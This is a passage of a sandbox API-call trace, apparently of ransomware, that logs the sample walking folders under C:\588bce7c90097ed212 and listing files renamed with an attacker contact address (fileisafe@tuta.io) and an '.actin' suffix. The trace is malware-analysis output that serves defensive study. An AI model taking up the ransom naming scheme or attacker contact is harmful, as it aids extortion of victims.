cAlternateFileName="DESKTO~1.ACT")) returned 0 [0140.043] FindClose (in: hFindFile=0xaa93d0 | out: hFindFile=0xaa93d0) returned 1 [0140.043] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30d0078 | out: hHeap=0x26a0000) returned 1 [0140.043] FindNextFileW (in: hFindFile=0xaa9490, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0140.043] FindClose (in: hFindFile=0xaa9490 | out: hFindFile=0xaa9490) returned 1 [0140.043] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30c0070 | out: hHeap=0x26a0000) returned 1 [0140.043] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x306f89c | out: lpFindFileData=0x306f89c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff610, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0140.043] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x306f89c | out: lpFindFileData=0x306f89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff610, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0140.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xaa91d0 [0140.090] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0140.090] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1025", cAlternateFileName="")) returned 1 [0140.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.092] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.092] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7f90d6, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1e82, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.092] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7f90d6, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7f90d6, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7f90d6, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x122f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.093] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7f90d6, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7f90d6, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c81f1bd, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4462, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.093] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7f90d6, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7f90d6, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c81f1bd, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4462, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.093] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.093] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.093] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1028", cAlternateFileName="")) returned 1 [0140.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.095] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.096] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c81f1bd, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c81f1bd, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c81f1bd, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x19a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.096] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c81f1bd, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c81f1bd, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ca817a7, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xeea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.096] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c845691, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c845691, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c845691, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x3862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.096] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c845691, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c845691, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c845691, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x3862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.096] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.097] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.097] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1029", cAlternateFileName="")) returned 1 [0140.097] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.099] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.099] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c845691, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c845691, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c86b502, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf82, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.099] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c86b502, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c86b502, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c86b502, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x13d52, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.099] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c89193d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c89193d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c89193d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.099] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c89193d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c89193d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c89193d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.099] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.100] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.100] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1030", cAlternateFileName="")) returned 1 [0140.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.102] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.102] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c89193d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c89193d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c89193d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xdf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.102] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c89193d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c89193d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc24f10, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x130c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.102] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbfef27, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cbfef27, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc24f10, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.102] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbfef27, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cbfef27, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc24f10, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.102] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.103] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.103] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1031", cAlternateFileName="")) returned 1 [0140.103] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.106] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.106] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc24f10, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc24f10, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc4b181, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xe52, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.106] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc4b181, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc4b181, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc4b181, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.106] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc4b181, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc4b181, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc4b181, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.106] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc4b181, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc4b181, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc4b181, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.106] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.107] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.107] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1032", cAlternateFileName="")) returned 1 [0140.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.110] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, 